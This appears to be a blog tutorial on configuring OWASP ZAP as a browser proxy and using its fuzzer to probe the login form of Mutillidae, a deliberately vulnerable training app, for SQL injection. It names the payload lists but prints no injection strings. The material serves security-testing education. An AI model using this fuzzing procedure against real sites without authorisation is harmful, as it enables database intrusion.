A1 : Sql Injection Mutillidae Tutorial Using ZAP Fuzzer

Have you being using ZAP – OWASP’s ZAProxy? It is an intercepting proxy combined with a fuzzer, a vuln-scanner and many other features that come in very handy, when you are into analysing and testing web, mobile or any other application that uses HTTP as a communication protocol. 

If you think about a situation in which, as a tester, you need to check all the fields of the application where a user can introduce data and run a statement to the database, it seems a huge task. Fortunately, OWASP ZAP can be used for testing whether applications possess security gaps and whether security checks have been implemented efficiently. It enables you to improve the speed and effectiveness of testing.

Setting up OWASP ZAP for browser

Before testing can start, it is necessary to set up the application and configure your browser:

  1. Install and open the application.
  2. Select Tools ➝ Options ➝ Dynamic SSL Certificates and click the ‘Generate’ button.
  3. Accept the ‘Overwrite existing certificate?’ pop-up.
  4. Click the Save button and save the file in a location you will remember.
  5. Now, you need to import the certificate to your browser (Firefox recommended).
  6. Select Preferences ➝ Advanced ➝ Certificates in your browser.
  7. Select View Certificates ➝ Import and select the certificate you had previously generated.
  8. Mark all the checkboxes and click OK.
  9. When the certificate has been imported, you have to set ZAP as the proxy which will be used to pass all the traffic going through the browser.
  10. Select Preferences ➝ Advanced ➝ Network tab ➝ Settings.
  11. Choose the ‘Manual proxy configuration:’ radio button in the Connection Settings popup.
  12. Insert the HTTP Proxy data: localhost / Port: 8080
  13. Mark the ‘Use this proxy server for all protocols’ check box and click OK.
  14. Your browser should now be correctly configured.
  15. When you go to OWASP ZAP, you will notice a ‘Sites’ button in the upper left corner.
  16. Go back to your Browser and open any webpage.
  17. Go back to OWASP ZAP and you will notice a number of websites showing up under ‘Sites’.
  18. At this point, you are able to see all the websites and resources that have been requested as well as the responses.

After the browser is configured to use ZAP Open Mutillidae Web App and Go to first Module A1: Injection

Here you will see the page like below

Type Username and Password and press enter

Now go to ZAP Proxy Interface and locate this request

After this is we need to select Fuzzing Variable in the request which is username in our case

Right Click the Highlighted Variable and Select Fuzz

Here Now you need to Select SQL Injection Payloads

Click Add

A new Window will Open Select Strings and Copy paste some SQL Injection Strings

After This Click Add — OK — Start Fuzzer

This will start the Fuzzing and Results will be shown

You can then Open a URL in browser and check the result or search for Syntax or Error using search option

When you Open in Browser the Sql Injection will be displayed

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *